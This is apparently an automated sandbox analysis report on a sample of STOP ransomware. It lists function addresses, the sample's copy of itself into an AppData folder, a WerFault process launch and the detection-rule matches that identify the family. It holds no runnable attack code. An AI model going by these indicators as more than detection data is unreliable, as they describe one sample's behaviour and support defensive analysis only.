          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004080306_2_00408030
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004101606_2_00410160
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004C81136_2_004C8113
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004021C06_2_004021C0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0044237E6_2_0044237E
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004084C06_2_004084C0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004344FF6_2_004344FF
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0043E5A36_2_0043E5A3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040A6606_2_0040A660
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0041E6906_2_0041E690
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004067406_2_00406740
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004027506_2_00402750
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040A7106_2_0040A710
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004087806_2_00408780
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0042C8046_2_0042C804
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004068806_2_00406880
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004349F36_2_004349F3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004069F36_2_004069F3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00402B806_2_00402B80
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00406B806_2_00406B80
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0044ACFF6_2_0044ACFF
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0042CE516_2_0042CE51
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00434E0B6_2_00434E0B
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00406EE06_2_00406EE0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00420F306_2_00420F30
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004050576_2_00405057
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0042F0106_2_0042F010
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004070E06_2_004070E0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004391F66_2_004391F6
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004352406_2_00435240
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004C93436_2_004C9343
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004054476_2_00405447
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004054576_2_00405457
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004495066_2_00449506
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0044B5B16_2_0044B5B1
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004356756_2_00435675
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004096866_2_00409686
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040F7306_2_0040F730
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0044D7A16_2_0044D7A1
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004819206_2_00481920
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0044D9DC6_2_0044D9DC
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00449A716_2_00449A71
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00443B406_2_00443B40
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00409CF96_2_00409CF9
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040DD406_2_0040DD40
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00427D6C6_2_00427D6C
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040BDC06_2_0040BDC0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00409DFA6_2_00409DFA
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00409F766_2_00409F76
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0046BFE06_2_0046BFE0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00449FE36_2_00449FE3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D72209_2_021D7220
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_022522C09_2_022522C0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_0221E37C9_2_0221E37C
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D73939_2_021D7393
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DB0009_2_021DB000
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021EF0309_2_021EF030
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DA0269_2_021DA026
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DB0B09_2_021DB0B0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021E00D09_2_021E00D0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D30F09_2_021D30F0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D70E09_2_021D70E0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D91209_2_021D9120
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_0221E1419_2_0221E141
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021FD1A49_2_021FD1A4
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DA6999_2_021DA699
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_0221B69F9_2_0221B69F
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DE6E09_2_021DE6E0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DC7609_2_021DC760
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DA79A9_2_021DA79A
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021FD7F19_2_021FD7F1
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D35209_2_021D3520
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D75209_2_021D7520
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DCA109_2_021DCA10
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D7A809_2_021D7A80
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021E0B009_2_021E0B00
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D2B609_2_021D2B60
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DDBE09_2_021DDBE0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D78809_2_021D7880
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021F18D09_2_021F18D0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021DA9169_2_021DA916
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021EA9309_2_021EA930
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021FF9B09_2_021FF9B0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021FE9A39_2_021FE9A3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D89D09_2_021D89D0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D59F79_2_021D59F7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D8E609_2_021D8E60
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_02204E9F9_2_02204E9F
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_02212D1E9_2_02212D1E
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D5DF79_2_021D5DF7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D5DE79_2_021D5DE7
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231722010_2_02317220
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_023922C010_2_023922C0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0235E37C10_2_0235E37C
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231739310_2_02317393
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0232F03010_2_0232F030
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231A02610_2_0231A026
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231B00010_2_0231B000
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231B0B010_2_0231B0B0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_023130F010_2_023130F0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_023170E010_2_023170E0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_023200D010_2_023200D0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231912010_2_02319120
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0235E14110_2_0235E141
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0233D1A410_2_0233D1A4
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231A69910_2_0231A699
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0235B69F10_2_0235B69F
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231E6E010_2_0231E6E0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231C76010_2_0231C760
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231A79A10_2_0231A79A
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0233D7F110_2_0233D7F1
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231352010_2_02313520
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231752010_2_02317520
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231CA1010_2_0231CA10
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02317A8010_2_02317A80
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02320B0010_2_02320B00
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02312B6010_2_02312B60
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231DBE010_2_0231DBE0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231788010_2_02317880
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_023318D010_2_023318D0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0232A93010_2_0232A930
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0231A91610_2_0231A916
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0233F9B010_2_0233F9B0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_0233E9A310_2_0233E9A3
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_023159F710_2_023159F7
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_023189D010_2_023189D0
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02318E6010_2_02318E60
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02344E9F10_2_02344E9F
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02352D1E10_2_02352D1E
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02315DF710_2_02315DF7
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02315DE710_2_02315DE7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 02218EC0 appears 57 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 00428C81 appears 42 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 02220160 appears 50 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 0040D970 appears 137 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 021F8EC0 appears 57 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 004547A0 appears 75 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 004102D0 appears 99 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 02200160 appears 50 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 0042F7C0 appears 99 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 0044F23E appears 53 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 00428520 appears 77 times
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 00454E50 appears 42 times
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 02338EC0 appears 57 times
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: String function: 02340160 appears 50 times
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1572
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
          Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.6.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
